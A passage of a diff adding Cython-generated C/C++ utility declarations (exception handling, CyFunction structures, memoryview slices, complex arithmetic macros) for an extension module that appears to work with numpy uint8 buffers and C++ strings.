CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE +static _PyErr_StackItem * __Pyx_PyErr_GetTopmostException(PyThreadState *tstate); +#endif + +/* SaveResetException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_ExceptionSave(type, value, tb) __Pyx__ExceptionSave(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#define __Pyx_ExceptionReset(type, value, tb) __Pyx__ExceptionReset(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +#else +#define __Pyx_ExceptionSave(type, value, tb) PyErr_GetExcInfo(type, value, tb) +#define __Pyx_ExceptionReset(type, value, tb) PyErr_SetExcInfo(type, value, tb) +#endif + +/* GetException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_GetException(type, value, tb) __Pyx__GetException(__pyx_tstate, type, value, tb) +static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#else +static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb); +#endif + +/* SwapException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_ExceptionSwap(type, value, tb) __Pyx__ExceptionSwap(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#else +static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb); +#endif + +/* ImportDottedModule.proto */ +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple); +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple); +#endif + +/* ssize_strlen.proto */ +static CYTHON_INLINE Py_ssize_t __Pyx_ssize_strlen(const char *s); + +/* FastTypeChecks.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); +#else +#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) +#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) +#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) +#endif +#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) +#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) + +CYTHON_UNUSED static int __pyx_memoryview_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +/* ListCompAppend.proto */ +#if CYTHON_USE_PYLIST_INTERNALS && CYTHON_ASSUME_SAFE_MACROS +static CYTHON_INLINE int __Pyx_ListComp_Append(PyObject* list, PyObject* x) { + PyListObject* L = (PyListObject*) list; + Py_ssize_t len = Py_SIZE(list); + if (likely(L->allocated > len)) { + Py_INCREF(x); + PyList_SET_ITEM(list, len, x); + __Pyx_SET_SIZE(list, len + 1); + return 0; + } + return PyList_Append(list, x); +} +#else +#define __Pyx_ListComp_Append(L,x) PyList_Append(L,x) +#endif + +/* PySequenceMultiply.proto */ +#define __Pyx_PySequence_Multiply_Left(mul, seq) __Pyx_PySequence_Multiply(seq, mul) +static CYTHON_INLINE PyObject* __Pyx_PySequence_Multiply(PyObject *seq, Py_ssize_t mul); + +/* SetItemInt.proto */ +#define __Pyx_SetItemInt(o, i, v, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_SetItemInt_Fast(o, (Py_ssize_t)i, v, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list assignment index out of range"), -1) :\ + __Pyx_SetItemInt_Generic(o, to_py_func(i), v))) +static int __Pyx_SetItemInt_Generic(PyObject *o, PyObject *j, PyObject *v); +static CYTHON_INLINE int __Pyx_SetItemInt_Fast(PyObject *o, Py_ssize_t i, PyObject *v, + int is_list, int wraparound, int boundscheck); + +/* RaiseUnboundLocalError.proto */ +static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname); + +/* DivInt[long].proto */ +static CYTHON_INLINE long __Pyx_div_long(long, long); + +/* ListAppend.proto */ +#if CYTHON_USE_PYLIST_INTERNALS && CYTHON_ASSUME_SAFE_MACROS +static CYTHON_INLINE int __Pyx_PyList_Append(PyObject* list, PyObject* x) { + PyListObject* L = (PyListObject*) list; + Py_ssize_t len = Py_SIZE(list); + if (likely(L->allocated > len) & likely(len > (L->allocated >> 1))) { + Py_INCREF(x); + PyList_SET_ITEM(list, len, x); + __Pyx_SET_SIZE(list, len + 1); + return 0; + } + return PyList_Append(list, x); +} +#else +#define __Pyx_PyList_Append(L,x) PyList_Append(L,x) +#endif + +/* StringJoin.proto */ +#if PY_MAJOR_VERSION < 3 +#define __Pyx_PyString_Join __Pyx_PyBytes_Join +#define __Pyx_PyBaseString_Join(s, v) (PyUnicode_CheckExact(s) ? PyUnicode_Join(s, v) : __Pyx_PyBytes_Join(s, v)) +#else +#define __Pyx_PyString_Join PyUnicode_Join +#define __Pyx_PyBaseString_Join PyUnicode_Join +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #if PY_MAJOR_VERSION < 3 + #define __Pyx_PyBytes_Join _PyString_Join + #else + #define __Pyx_PyBytes_Join _PyBytes_Join + #endif +#else +static CYTHON_INLINE PyObject* __Pyx_PyBytes_Join(PyObject* sep, PyObject* values); +#endif + +/* CIntToPyUnicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_size_t(size_t value, Py_ssize_t width, char padding_char, char format_char); + +/* MoveIfSupported.proto */ +#if __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600) + #include + #define __PYX_STD_MOVE_IF_SUPPORTED(x) std::move(x) +#else + #define __PYX_STD_MOVE_IF_SUPPORTED(x) x +#endif + +/* IncludeCppStringH.proto */ +#include + +/* decode_c_string_utf16.proto */ +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_DecodeUTF16(const char *s, Py_ssize_t size, const char *errors) { + int byteorder = 0; + return PyUnicode_DecodeUTF16(s, size, errors, &byteorder); +} +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_DecodeUTF16LE(const char *s, Py_ssize_t size, const char *errors) { + int byteorder = -1; + return PyUnicode_DecodeUTF16(s, size, errors, &byteorder); +} +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_DecodeUTF16BE(const char *s, Py_ssize_t size, const char *errors) { + int byteorder = 1; + return PyUnicode_DecodeUTF16(s, size, errors, &byteorder); +} + +/* decode_c_bytes.proto */ +static CYTHON_INLINE PyObject* __Pyx_decode_c_bytes( + const char* cstring, Py_ssize_t length, Py_ssize_t start, Py_ssize_t stop, + const char* encoding, const char* errors, + PyObject* (*decode_func)(const char *s, Py_ssize_t size, const char *errors)); + +/* decode_cpp_string.proto */ +static CYTHON_INLINE PyObject* __Pyx_decode_cpp_string( + std::string cppstring, Py_ssize_t start, Py_ssize_t stop, + const char* encoding, const char* errors, + PyObject* (*decode_func)(const char *s, Py_ssize_t size, const char *errors)) { + return __Pyx_decode_c_bytes( + cppstring.data(), cppstring.size(), start, stop, encoding, errors, decode_func); +} + +/* PyObjectCallNoArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func); + +/* BufferIndexError.proto */ +static void __Pyx_RaiseBufferIndexError(int axis); + +/* PyObject_GenericGetAttrNoDict.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttrNoDict PyObject_GenericGetAttr +#endif + +/* PyObject_GenericGetAttr.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttr PyObject_GenericGetAttr +#endif + +/* IncludeStructmemberH.proto */ +#include + +/* FixUpExtensionType.proto */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); +#endif + +/* PyObjectGetMethod.proto */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method); + +/* PyObjectCallMethod0.proto */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name); + +/* ValidateBasesTuple.proto */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases); +#endif + +/* PyType_Ready.proto */ +CYTHON_UNUSED static int __Pyx_PyType_Ready(PyTypeObject *t); + +/* SetVTable.proto */ +static int __Pyx_SetVtable(PyTypeObject* typeptr , void* vtable); + +/* GetVTable.proto */ +static void* __Pyx_GetVtable(PyTypeObject *type); + +/* MergeVTables.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_MergeVtables(PyTypeObject *type); +#endif + +/* SetupReduce.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce(PyObject* type_obj); +#endif + +/* TypeImport.proto */ +#ifndef __PYX_HAVE_RT_ImportType_proto_3_0_0 +#define __PYX_HAVE_RT_ImportType_proto_3_0_0 +#if defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L +#include +#endif +#if (defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L) || __cplusplus >= 201103L +#define __PYX_GET_STRUCT_ALIGNMENT_3_0_0(s) alignof(s) +#else +#define __PYX_GET_STRUCT_ALIGNMENT_3_0_0(s) sizeof(void*) +#endif +enum __Pyx_ImportType_CheckSize_3_0_0 { + __Pyx_ImportType_CheckSize_Error_3_0_0 = 0, + __Pyx_ImportType_CheckSize_Warn_3_0_0 = 1, + __Pyx_ImportType_CheckSize_Ignore_3_0_0 = 2 +}; +static PyTypeObject *__Pyx_ImportType_3_0_0(PyObject* module, const char *module_name, const char *class_name, size_t size, size_t alignment, enum __Pyx_ImportType_CheckSize_3_0_0 check_size); +#endif + +/* FetchSharedCythonModule.proto */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void); + +/* FetchCommonType.proto */ +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); +#else +static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); +#endif + +/* PyMethodNew.proto */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { + CYTHON_UNUSED_VAR(typ); + if (!self) + return __Pyx_NewRef(func); + return PyMethod_New(func, self); +} +#else + #define __Pyx_PyMethod_New PyMethod_New +#endif + +/* PyVectorcallFastCallDict.proto */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); +#endif + +/* CythonFunctionShared.proto */ +#define __Pyx_CyFunction_USED +#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 +#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 +#define __Pyx_CYFUNCTION_CCLASS 0x04 +#define __Pyx_CYFUNCTION_COROUTINE 0x08 +#define __Pyx_CyFunction_GetClosure(f)\ + (((__pyx_CyFunctionObject *) (f))->func_closure) +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_CyFunction_GetClassObj(f)\ + (((__pyx_CyFunctionObject *) (f))->func_classobj) +#else + #define __Pyx_CyFunction_GetClassObj(f)\ + ((PyObject*) ((PyCMethodObject *) (f))->mm_class) +#endif +#define __Pyx_CyFunction_SetClassObj(f, classobj)\ + __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) +#define __Pyx_CyFunction_Defaults(type, f)\ + ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) +#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ + ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) +typedef struct { +#if PY_VERSION_HEX < 0x030900B1 + PyCFunctionObject func; +#else + PyCMethodObject func; +#endif +#if CYTHON_BACKPORT_VECTORCALL + __pyx_vectorcallfunc func_vectorcall; +#endif +#if PY_VERSION_HEX < 0x030500A0 + PyObject *func_weakreflist; +#endif + PyObject *func_dict; + PyObject *func_name; + PyObject *func_qualname; + PyObject *func_doc; + PyObject *func_globals; + PyObject *func_code; + PyObject *func_closure; +#if PY_VERSION_HEX < 0x030900B1 + PyObject *func_classobj; +#endif + void *defaults; + int defaults_pyobjects; + size_t defaults_size; // used by FusedFunction for copying defaults + int flags; + PyObject *defaults_tuple; + PyObject *defaults_kwdict; + PyObject *(*defaults_getter)(PyObject *); + PyObject *func_annotations; + PyObject *func_is_coroutine; +} __pyx_CyFunctionObject; +#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) +#define __Pyx_IsCyOrPyCFunction(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) +#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, + size_t size, + int pyobjects); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, + PyObject *tuple); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, + PyObject *dict); +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, + PyObject *dict); +static int __pyx_CyFunction_init(PyObject *module); +#if CYTHON_METH_FASTCALL +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +#if CYTHON_BACKPORT_VECTORCALL +#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) +#else +#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) +#endif +#endif + +/* CythonFunction.proto */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); + +/* Py3UpdateBases.proto */ +static PyObject* __Pyx_PEP560_update_bases(PyObject *bases); + +/* SetNameInClass.proto */ +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 +#define __Pyx_SetNameInClass(ns, name, value)\ + (likely(PyDict_CheckExact(ns)) ? _PyDict_SetItem_KnownHash(ns, name, value, ((PyASCIIObject *) name)->hash) : PyObject_SetItem(ns, name, value)) +#elif CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_SetNameInClass(ns, name, value)\ + (likely(PyDict_CheckExact(ns)) ? PyDict_SetItem(ns, name, value) : PyObject_SetItem(ns, name, value)) +#else +#define __Pyx_SetNameInClass(ns, name, value) PyObject_SetItem(ns, name, value) +#endif + +/* SetNewInClass.proto */ +static int __Pyx_SetNewInClass(PyObject *ns, PyObject *name, PyObject *value); + +/* CalculateMetaclass.proto */ +static PyObject *__Pyx_CalculateMetaclass(PyTypeObject *metaclass, PyObject *bases); + +/* PyObjectCall2Args.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call2Args(PyObject* function, PyObject* arg1, PyObject* arg2); + +/* PyObjectLookupSpecial.proto */ +#if CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS +#define __Pyx_PyObject_LookupSpecialNoError(obj, attr_name) __Pyx__PyObject_LookupSpecial(obj, attr_name, 0) +#define __Pyx_PyObject_LookupSpecial(obj, attr_name) __Pyx__PyObject_LookupSpecial(obj, attr_name, 1) +static CYTHON_INLINE PyObject* __Pyx__PyObject_LookupSpecial(PyObject* obj, PyObject* attr_name, int with_error); +#else +#define __Pyx_PyObject_LookupSpecialNoError(o,n) __Pyx_PyObject_GetAttrStrNoError(o,n) +#define __Pyx_PyObject_LookupSpecial(o,n) __Pyx_PyObject_GetAttrStr(o,n) +#endif + +/* Py3ClassCreate.proto */ +static PyObject *__Pyx_Py3MetaclassPrepare(PyObject *metaclass, PyObject *bases, PyObject *name, PyObject *qualname, + PyObject *mkw, PyObject *modname, PyObject *doc); +static PyObject *__Pyx_Py3ClassCreate(PyObject *metaclass, PyObject *name, PyObject *bases, PyObject *dict, + PyObject *mkw, int calculate_metaclass, int allow_py2_metaclass); + +/* Globals.proto */ +static PyObject* __Pyx_Globals(void); + +/* dict_getitem_default.proto */ +static PyObject* __Pyx_PyDict_GetItemDefault(PyObject* d, PyObject* key, PyObject* default_value); + +/* UnpackUnboundCMethod.proto */ +typedef struct { + PyObject *type; + PyObject **method_name; + PyCFunction func; + PyObject *method; + int flag; +} __Pyx_CachedCFunction; + +/* CallUnboundCMethod1.proto */ +static PyObject* __Pyx__CallUnboundCMethod1(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg); +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_CallUnboundCMethod1(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg); +#else +#define __Pyx_CallUnboundCMethod1(cfunc, self, arg) __Pyx__CallUnboundCMethod1(cfunc, self, arg) +#endif + +/* CallUnboundCMethod2.proto */ +static PyObject* __Pyx__CallUnboundCMethod2(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg1, PyObject* arg2); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030600B1 +static CYTHON_INLINE PyObject *__Pyx_CallUnboundCMethod2(__Pyx_CachedCFunction *cfunc, PyObject *self, PyObject *arg1, PyObject *arg2); +#else +#define __Pyx_CallUnboundCMethod2(cfunc, self, arg1, arg2) __Pyx__CallUnboundCMethod2(cfunc, self, arg1, arg2) +#endif + +/* GetNameInClass.proto */ +#define __Pyx_GetNameInClass(var, nmspace, name) (var) = __Pyx__GetNameInClass(nmspace, name) +static PyObject *__Pyx__GetNameInClass(PyObject *nmspace, PyObject *name); + +/* CLineInTraceback.proto */ +#ifdef CYTHON_CLINE_IN_TRACEBACK +#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) +#else +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); +#endif + +/* CodeObjectCache.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +typedef struct { + PyCodeObject* code_object; + int code_line; +} __Pyx_CodeObjectCacheEntry; +struct __Pyx_CodeObjectCache { + int count; + int max_count; + __Pyx_CodeObjectCacheEntry* entries; +}; +static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); +static PyCodeObject *__pyx_find_code_object(int code_line); +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); +#endif + +/* AddTraceback.proto */ +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename); + +#if PY_MAJOR_VERSION < 3 + static int __Pyx_GetBuffer(PyObject *obj, Py_buffer *view, int flags); + static void __Pyx_ReleaseBuffer(Py_buffer *view); +#else + #define __Pyx_GetBuffer PyObject_GetBuffer + #define __Pyx_ReleaseBuffer PyBuffer_Release +#endif + + +/* BufferStructDeclare.proto */ +typedef struct { + Py_ssize_t shape, strides, suboffsets; +} __Pyx_Buf_DimInfo; +typedef struct { + size_t refcount; + Py_buffer pybuffer; +} __Pyx_Buffer; +typedef struct { + __Pyx_Buffer *rcbuffer; + char *data; + __Pyx_Buf_DimInfo diminfo[8]; +} __Pyx_LocalBuf_ND; + +/* MemviewSliceIsContig.proto */ +static int __pyx_memviewslice_is_contig(const __Pyx_memviewslice mvs, char order, int ndim); + +/* OverlappingSlices.proto */ +static int __pyx_slices_overlap(__Pyx_memviewslice *slice1, + __Pyx_memviewslice *slice2, + int ndim, size_t itemsize); + +/* None.proto */ +#include + +/* IsLittleEndian.proto */ +static CYTHON_INLINE int __Pyx_Is_Little_Endian(void); + +/* BufferFormatCheck.proto */ +static const char* __Pyx_BufFmt_CheckString(__Pyx_BufFmt_Context* ctx, const char* ts); +static void __Pyx_BufFmt_Init(__Pyx_BufFmt_Context* ctx, + __Pyx_BufFmt_StackElem* stack, + __Pyx_TypeInfo* type); + +/* TypeInfoCompare.proto */ +static int __pyx_typeinfo_cmp(__Pyx_TypeInfo *a, __Pyx_TypeInfo *b); + +/* MemviewSliceValidateAndInit.proto */ +static int __Pyx_ValidateAndInit_memviewslice( + int *axes_specs, + int c_or_f_flag, + int buf_flags, + int ndim, + __Pyx_TypeInfo *dtype, + __Pyx_BufFmt_StackElem stack[], + __Pyx_memviewslice *memviewslice, + PyObject *original_obj); + +/* ObjectToMemviewSlice.proto */ +static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_ds_unsigned_char__const__(PyObject *, int writable_flag); + +/* MemviewDtypeToObject.proto */ +static CYTHON_INLINE PyObject *__pyx_memview_get_nn___pyx_t_5numpy_uint8_t(const char *itemp); +static CYTHON_INLINE int __pyx_memview_set_nn___pyx_t_5numpy_uint8_t(const char *itemp, PyObject *obj); + +/* MemviewDtypeToObject.proto */ +static CYTHON_INLINE PyObject *__pyx_memview_get_unsigned_char__const__(const char *itemp); + +/* RealImag.proto */ +#if CYTHON_CCOMPLEX + #ifdef __cplusplus + #define __Pyx_CREAL(z) ((z).real()) + #define __Pyx_CIMAG(z) ((z).imag()) + #else + #define __Pyx_CREAL(z) (__real__(z)) + #define __Pyx_CIMAG(z) (__imag__(z)) + #endif +#else + #define __Pyx_CREAL(z) ((z).real) + #define __Pyx_CIMAG(z) ((z).imag) +#endif +#if defined(__cplusplus) && CYTHON_CCOMPLEX\ + && (defined(_WIN32) || defined(__clang__) || (defined(__GNUC__) && (__GNUC__ >= 5 || __GNUC__ == 4 && __GNUC_MINOR__ >= 4 )) || __cplusplus >= 201103) + #define __Pyx_SET_CREAL(z,x) ((z).real(x)) + #define __Pyx_SET_CIMAG(z,y) ((z).imag(y)) +#else + #define __Pyx_SET_CREAL(z,x) __Pyx_CREAL(z) = (x) + #define __Pyx_SET_CIMAG(z,y) __Pyx_CIMAG(z) = (y) +#endif + +/* Arithmetic.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #define __Pyx_c_eq_float(a, b) ((a)==(b)) + #define __Pyx_c_sum_float(a, b) ((a)+(b)) + #define __Pyx_c_diff_float(a, b) ((a)-(b)) + #define __Pyx_c_prod_float(a, b) ((a)*(b)) + #define __Pyx_c_quot_float(a, b) ((a)/(b)) + #define __Pyx_c_neg_float(a) (-(a)) + #ifdef __cplusplus + #define __Pyx_c_is_zero_float(z) ((z)==(float)0) + #define __Pyx_c_conj_float(z) (::std::conj(z)) + #if 1 + #define __Pyx_c_abs_float(z) (::std::abs(z)) + #define __Pyx_c_pow_float(a, b) (::std::pow(a, b)) + #endif + #else + #define __Pyx_c_is_zero_float(z) ((z)==0) + #define __Pyx_c_conj_float(z) (conjf(z)) + #if 1 + #define __Pyx_c_abs_float(z) (cabsf(z)) + #define __Pyx_c_pow_float(a, b) (cpowf(a, b)) + #endif + #endif +#else + static CYTHON_INLINE int __Pyx_c_eq_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_sum_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_diff_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_prod_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_neg_float(__pyx_t_float_complex); + static CYTHON_INLINE int __Pyx_c_is_zero_float(__pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_conj_float(__pyx_t_float_complex); + #if 1 + static CYTHON_INLINE float __Pyx_c_abs_float(__pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_pow_float(__pyx_t_float_complex, __pyx_t_float_complex); + #endif +#endif + +/* Arithmetic.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #define __Pyx_c_eq_double(a, b) ((a)==(b)) + #define __Pyx_c_sum_double(a, b) ((a)+(b)) + #define __Pyx_c_diff_double(a, b) ((a)-(b)) + #define __Pyx_c_prod_double(a, b) ((a)*(b)) + #define __Pyx_c_quot_double(a, b) ((a)/(b)) + #define __Pyx_c_neg_double(a) (-(a)) + #ifdef __cplusplus + #define __Pyx_c_is_zero_double(z) ((z)==(double)0) + #define __Pyx_c_conj_double(z) (::std::conj(z)) + #if 1 + #define __Pyx_c_abs_double(z) (::std::abs(z)) + #define __Pyx_c_pow_double(a, b) (::std::pow(a, b)) + #endif + #else + #define __Pyx_c_is_zero_double(z) ((z)==0) + #define __Pyx_c_conj_double(z) (conj(z)) + #if 1 + #define __Pyx_c_abs_double(z) (cabs(z)) + #define __Pyx_c_pow_double(a, b) (cpow(a, b)) + #endif + #endif +#else + static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex); + static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex); + #if 1 + static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex, __pyx_t_double_complex); + #endif +#endif + +/* MemviewSliceCopyTemplate.proto */ +static __Pyx_memviewslice +__pyx_memoryview_copy_new_contig(const __Pyx_memviewslice *from_mvs, + const char *mode, int ndim, + size_t sizeof_dtype, int contig_flag, + int dtype_is_object); + +/* MemviewSliceInit.proto */ +#define __Pyx_BUF_MAX_NDIMS %(BUF_MAX_NDIMS)d +#define __Pyx_MEMVIEW_DIRECT 1 +#define __Pyx_MEMVIEW_PTR 2 +#define __Pyx_MEMVIEW_FULL 4 +#define __Pyx_MEMVIEW_CONTIG 8 +#define __Pyx_MEMVIEW_STRIDED 16 +#define __Pyx_MEMVIEW_FOLLOW 32 +#define __Pyx_IS_C_CONTIG 1 +#define __Pyx_IS_F_CONTIG 2 +static int __Pyx_init_memviewslice( + struct __pyx_memoryview_obj *memview, + int ndim, + __Pyx_memviewslice *memviewslice, + int memview_is_new_reference); +static CYTHON_INLINE int __pyx_add_acquisition_count_locked( + __pyx_atomic_int_type *acquisition_count, PyThread_type_lock lock); +static CYTHON_INLINE int 